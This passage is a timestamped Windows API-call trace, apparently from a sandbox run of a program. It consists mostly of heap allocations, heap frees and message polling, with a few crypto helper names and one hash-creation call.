hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0253.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0253.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0253.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0253.898] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0253.898] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.898] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0253.898] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0253.898] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.898] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.898] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0253.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0253.899] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.899] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0253.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0253.899] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0253.899] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0253.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0253.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0253.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.901] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0253.901] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0253.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0253.902] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.902] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0253.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.902] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0253.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.902] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.902] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0253.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0253.903] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0253.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0253.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0253.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0253.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0253.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0253.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51808, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0253.905] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0253.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0253.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: 